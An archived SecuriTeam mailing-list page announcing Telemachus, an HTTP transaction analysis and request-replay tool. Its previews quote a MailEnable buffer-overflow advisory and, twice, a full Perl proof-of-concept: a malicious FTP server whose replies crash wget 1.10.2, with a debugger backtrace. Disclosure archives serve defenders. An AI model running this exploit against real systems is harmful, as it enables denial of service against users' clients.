osdir.com
mailing list archive
Mozy Online Backup: 2GB Free. Automatic. Secure.

Subject: [TOOL] Telemachus - HTTP Transactions Manipulation and Analysis - msg#00026

List: security.securiteam

Date: Prev Next Index Thread: Prev Next Index
The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Telemachus - HTTP Transactions Manipulation and Analysis
------------------------------------------------------------------------


SUMMARY



DETAILS

Telemachus is a companion utility for Odysseus, allowing further analysis
and manipulation of the HTTP transactions that have passed through
Odysseus.

Telemachus can communicate with the currently active instance of Odysseus,
or alternately load a previously saved Odysseus activity log file.

Although primarily designed to be used in conjunction with Odysseus,
Telemachus can be used a stand-alone utility.

Features:
* Easily browseable history of transactions
* Visual representation of the structure corresponding to the logged
transactions
* Request editing and replay
* Simple cookie analysis
* Quick log data elements observed from logged transactions.


ADDITIONAL INFORMATION

The information has been provided by <mailto:dave@xxxxxxxxxxxxx> Dave.
To keep updated with the tool visit the project's homepage at:
<http://www.bindshell.net/telemachus> http://www.bindshell.net/telemachus



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.







Was this page helpful?
Yes No
Thread at a glance:

Previous Message by Date: click to view message preview

[NT] MailEnable POP Service "PASS" Command Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - MailEnable POP Service "PASS" Command Buffer Overflow ------------------------------------------------------------------------ SUMMARY " <http://mailenable.com/> MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effective mail services". Secunia Research has discovered a vulnerability in MailEnable, which can be exploited by malicious people to compromise a vulnerable system. DETAILS Vulnerable Systems: * MailEnable Enterprise Edition version 2.35 * MailEnable Professional Edition version 2.35 The vulnerability is caused due to a boundary error in the POP service when handling arguments passed to the "PASS" command. This can be exploited to cause a stack-based buffer overflow by passing an overly long, specially crafted string as argument to the affected command. Successful exploitation allows execution of arbitrary code. Solution: Apply hotfix: <http://www.mailenable.com/hotfix/ME-10026.EXE> http://www.mailenable.com/hotfix/ME-10026.EXE Time Table: 18/12/2006 - Vendor notified. 18/12/2006 - Vendor response and hotfix released. 18/12/2006 - Public disclosure. CVE Information: <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6605> CVE-2006-6605 ADDITIONAL INFORMATION The information has been provided by <mailto:vuln@xxxxxxxxxxx> Secunia Research. The original article can be found at: <http://secunia.com/secunia_research/2006-75/> http://secunia.com/secunia_research/2006-75/ ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next Message by Date: click to view message preview

[EXPL] wget SYST Unchecked Boundary Condition

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - wget SYST Unchecked Boundary Condition ------------------------------------------------------------------------ SUMMARY A vulnerability in wget's SYST implementation allows a remote attacker to cause wget to crash by supplying it with a malformed response to its SYST request. DETAILS Exploit: #!/usr/bin/perl ############################################### # wget <= 1.10.2 | Unchecked Boundary Condition # Federico L. Bossi Bonin # # www.globalst.com.ar # fbossi[at]globalst.com.ar ############################################### use strict; use IO::Socket; #Resolving localhost... 127.0.0.1 #Connecting to localhost|127.0.0.1|:21... connected. #Logging in as anonymous ... Logged in! #==> SYST ... #Program received signal SIGSEGV, Segmentation fault. #[Switching to Thread -1211496768 (LWP 22824)] #0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 #(gdb) backtrace #0 0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 #1 0x080542c5 in ftp_syst (csock=6, server_type=0xbfe3d854) at ftp-basic.c:1042 #2 0x0804fa6f in getftp (u=0x80800a0, len=0xbfe3d5d8, restval=0, con=0xbfe3d840) at ftp.c:367 #3 0x08051211 in ftp_loop_internal (u=0x80800a0, f=0x0, con=0xbfe3d840) at ftp.c:1197 #4 0x08051877 in ftp_get_listing (u=0x80800a0, con=0xbfe3d840, f=0xbfe3d7a8) at ftp.c:1341 #5 0x08051a83 in ftp_retrieve_glob (u=0x80800a0, con=0xbfe3d840, action=2) at ftp.c:1705 #6 0x08052910 in ftp_loop (u=0x80800a0, dt=0xbfe3d978, proxy=0x0) at ftp.c:1875 #7 0x08066cf8 in retrieve_url (origurl=0x8080070 "ftp://localhost", file=0xbfe3d970, newloc=0xbfe3d974, refurl=0x0,dt=0xbfe3d978) at retr.c:678 #8 0x08061bdc in main (argc=3, argv=0xbfe3da84) at main.c:943 #(gdb) my $PORT=21; $SIG{CHLD} = 'IGNORE'; my $listen = IO::Socket::INET->new(LocalPort => $PORT, Listen => 10,Proto => 'tcp',Reuse => 1); die "Cant't bind port: $@" unless $listen; print "wget PoC\nWainting conections\n"; while (my $connection = $listen->accept){ my $child; while (my $connection = $listen->accept){ my $child; die "Can't fork: $!" unless defined ($child = fork()); if ($child == 0){ $listen->close; while() { print $connection "220 \n"; } exit 0; } else { print "Connecton recieved ... ",$connection->peerhost,"\n"; $connection->close(); } } #while } #while # milw0rm.com [2006-12-18] ADDITIONAL INFORMATION The information has been provided by <mailto:fbossi@xxxxxxxxxxxxxxx> Federico L. Bossi Bonin. The original article can be found at: <http://www.milw0rm.com/exploits/2947> http://www.milw0rm.com/exploits/2947 ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Previous Message by Thread: click to view message preview

[NT] MailEnable POP Service "PASS" Command Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - MailEnable POP Service "PASS" Command Buffer Overflow ------------------------------------------------------------------------ SUMMARY " <http://mailenable.com/> MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effective mail services". Secunia Research has discovered a vulnerability in MailEnable, which can be exploited by malicious people to compromise a vulnerable system. DETAILS Vulnerable Systems: * MailEnable Enterprise Edition version 2.35 * MailEnable Professional Edition version 2.35 The vulnerability is caused due to a boundary error in the POP service when handling arguments passed to the "PASS" command. This can be exploited to cause a stack-based buffer overflow by passing an overly long, specially crafted string as argument to the affected command. Successful exploitation allows execution of arbitrary code. Solution: Apply hotfix: <http://www.mailenable.com/hotfix/ME-10026.EXE> http://www.mailenable.com/hotfix/ME-10026.EXE Time Table: 18/12/2006 - Vendor notified. 18/12/2006 - Vendor response and hotfix released. 18/12/2006 - Public disclosure. CVE Information: <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6605> CVE-2006-6605 ADDITIONAL INFORMATION The information has been provided by <mailto:vuln@xxxxxxxxxxx> Secunia Research. The original article can be found at: <http://secunia.com/secunia_research/2006-75/> http://secunia.com/secunia_research/2006-75/ ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next Message by Thread: click to view message preview

[EXPL] wget SYST Unchecked Boundary Condition

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - wget SYST Unchecked Boundary Condition ------------------------------------------------------------------------ SUMMARY A vulnerability in wget's SYST implementation allows a remote attacker to cause wget to crash by supplying it with a malformed response to its SYST request. DETAILS Exploit: #!/usr/bin/perl ############################################### # wget <= 1.10.2 | Unchecked Boundary Condition # Federico L. Bossi Bonin # # www.globalst.com.ar # fbossi[at]globalst.com.ar ############################################### use strict; use IO::Socket; #Resolving localhost... 127.0.0.1 #Connecting to localhost|127.0.0.1|:21... connected. #Logging in as anonymous ... Logged in! #==> SYST ... #Program received signal SIGSEGV, Segmentation fault. #[Switching to Thread -1211496768 (LWP 22824)] #0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 #(gdb) backtrace #0 0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 #1 0x080542c5 in ftp_syst (csock=6, server_type=0xbfe3d854) at ftp-basic.c:1042 #2 0x0804fa6f in getftp (u=0x80800a0, len=0xbfe3d5d8, restval=0, con=0xbfe3d840) at ftp.c:367 #3 0x08051211 in ftp_loop_internal (u=0x80800a0, f=0x0, con=0xbfe3d840) at ftp.c:1197 #4 0x08051877 in ftp_get_listing (u=0x80800a0, con=0xbfe3d840, f=0xbfe3d7a8) at ftp.c:1341 #5 0x08051a83 in ftp_retrieve_glob (u=0x80800a0, con=0xbfe3d840, action=2) at ftp.c:1705 #6 0x08052910 in ftp_loop (u=0x80800a0, dt=0xbfe3d978, proxy=0x0) at ftp.c:1875 #7 0x08066cf8 in retrieve_url (origurl=0x8080070 "ftp://localhost", file=0xbfe3d970, newloc=0xbfe3d974, refurl=0x0,dt=0xbfe3d978) at retr.c:678 #8 0x08061bdc in main (argc=3, argv=0xbfe3da84) at main.c:943 #(gdb) my $PORT=21; $SIG{CHLD} = 'IGNORE'; my $listen = IO::Socket::INET->new(LocalPort => $PORT, Listen => 10,Proto => 'tcp',Reuse => 1); die "Cant't bind port: $@" unless $listen; print "wget PoC\nWainting conections\n"; while (my $connection = $listen->accept){ my $child; while (my $connection = $listen->accept){ my $child; die "Can't fork: $!" unless defined ($child = fork()); if ($child == 0){ $listen->close; while() { print $connection "220 \n"; } exit 0; } else { print "Connecton recieved ... ",$connection->peerhost,"\n"; $connection->close(); } } #while } #while # milw0rm.com [2006-12-18] ADDITIONAL INFORMATION The information has been provided by <mailto:fbossi@xxxxxxxxxxxxxxx> Federico L. Bossi Bonin. The original article can be found at: <http://www.milw0rm.com/exploits/2947> http://www.milw0rm.com/exploits/2947 ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Sign up for updates to this mailing list. email:
Loading Comments...
Home | News | Patents | Sitemap | FAQ | advertise

Advertising by